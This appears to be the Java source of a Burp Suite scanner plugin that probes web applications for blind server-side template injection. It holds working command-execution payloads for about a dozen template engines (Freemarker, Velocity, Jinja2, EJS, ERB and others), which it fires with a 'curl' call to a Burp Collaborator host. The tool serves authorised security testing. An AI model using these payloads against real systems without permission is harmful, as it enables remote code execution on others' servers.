package com.yandex.burp.extensions.plugins.audit;

import java.util.ArrayList;
import java.util.List;

import burp.IBurpCollaboratorClientContext;
import burp.IBurpCollaboratorInteraction;
import burp.IBurpExtenderCallbacks;
import burp.IExtensionHelpers;
import burp.IHttpRequestResponse;
import burp.IHttpService;
import burp.IRequestInfo;
import burp.IResponseInfo;
import burp.IScanIssue;
import burp.IScannerInsertionPoint;
import com.yandex.burp.extensions.plugins.CustomScanIssue;
import com.yandex.burp.extensions.plugins.config.BurpMollyPackConfig;


/**
 * Created by ilyaon on 08/07/2019.
 */
public class BlindSSTIPlugin implements IAuditPlugin {

    private IBurpExtenderCallbacks callbacks;
    private IExtensionHelpers helpers;

    private static final int ISSUE_TYPE = 0x00101080;
    private static final String ISSUE_NAME = "Server Side Template Injection";
    private static final String SEVERITY = "High";
    private static final String CONFIDENCE = "Certain";

    // https://github.com/DiogoMRSilva/websitesVulnerableToSSTI
    // https://portswigger.net/blog/server-side-template-injection
    private static final String[] payloadTemplates = {
            "<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"%s\")}", // javaFreemarker +
            "#set($engine=\"\")\r\n"
                    + "#set($proc=$engine.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"%s\"))\r\n"
                    + "#set($null=$proc.waitFor())\r\n"
                    + "${null}", // javaVelocity +
            "{{=global.process.mainModule.require('child_process').execSync('%s').toString()}}", // Javascript dot +
            "<%%=global.process.mainModule.require('child_process').execSync('%s').toString()%%>", // Javascript EJS +
            "#{global.process.mainModule.require('child_process').execSync('%s').toString()}", // Javascript jade (Pug)+
            "{{range.constructor(\"return eval(\\\"global.process.mainModule.require('child_process').execSync('%s').toString()\\\")\")()}}", // Javascript Nunjucks+
            "{system(\"%s\")}", // PHP smarty+
            "{{''.__class__.__mro__[1].__subclasses__()[286]('%s',shell=True)}}\n", // python3 jinja2
            "${__import__(\"subprocess\").check_output(\"%s\",shell=True)}", // python Mako
            "{{__import__(\"subprocess\").check_output(\"%s\",shell=True)}}", // Python Tornado
            "<%%=%%x(%s)%%>", // Ruby ERB
            "#{%%x(%s)}" // Ruby Slims
    };

    private static final String commandTeplate = "curl http://%s";

    public BlindSSTIPlugin(IBurpExtenderCallbacks callbacks, BurpMollyPackConfig extConfigd) {
        this.callbacks = callbacks;
        this.helpers = callbacks.getHelpers();
    }

    @Override
    public List<IScanIssue> doScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) {
        IResponseInfo resp = helpers.analyzeResponse(baseRequestResponse.getResponse());
        IRequestInfo req = helpers.analyzeRequest(baseRequestResponse.getRequest());
        if (resp == null || req == null)
            return null;

        if (insertionPoint.getInsertionPointType() != IScannerInsertionPoint.INS_ENTIRE_BODY
                && insertionPoint.getInsertionPointType() != IScannerInsertionPoint.INS_PARAM_BODY
                && insertionPoint.getInsertionPointType() != IScannerInsertionPoint.INS_PARAM_NAME_BODY
                && insertionPoint.getInsertionPointType() != IScannerInsertionPoint.INS_PARAM_NAME_URL
                && insertionPoint.getInsertionPointType() != IScannerInsertionPoint.INS_PARAM_URL)
            return null;

        List<IScanIssue> issues = new ArrayList<>();

        IHttpService httpService = baseRequestResponse.getHttpService();
        IBurpCollaboratorClientContext context = callbacks.createBurpCollaboratorClientContext();

        for (String template : payloadTemplates) {
            String collaboratorUrl = context.generatePayload(true);
            String command = String.format(commandTeplate, collaboratorUrl);
            String payload = String.format(template, command);

            this.callbacks.makeHttpRequest(httpService,
                    insertionPoint.buildRequest(this.helpers.stringToBytes(payload)));
        }

        List<IBurpCollaboratorInteraction> interactions = context.fetchAllCollaboratorInteractions();

        if (!interactions.isEmpty()) {
            String attackDetails = "Server Side Template Injection blind detection (https://portswigger.net/blog/server-side-template-injection)";

            issues.add(new CustomScanIssue(baseRequestResponse.getHttpService(),
                    this.helpers.analyzeRequest(baseRequestResponse).getUrl(),
                    new IHttpRequestResponse[] {
                            this.callbacks.applyMarkers(baseRequestResponse, null, null)
                    }, attackDetails, ISSUE_TYPE, ISSUE_NAME, SEVERITY, CONFIDENCE,
                    "", "", ""));
        }


        if (!issues.isEmpty())
            return issues;
        else
            return null;
    }
}
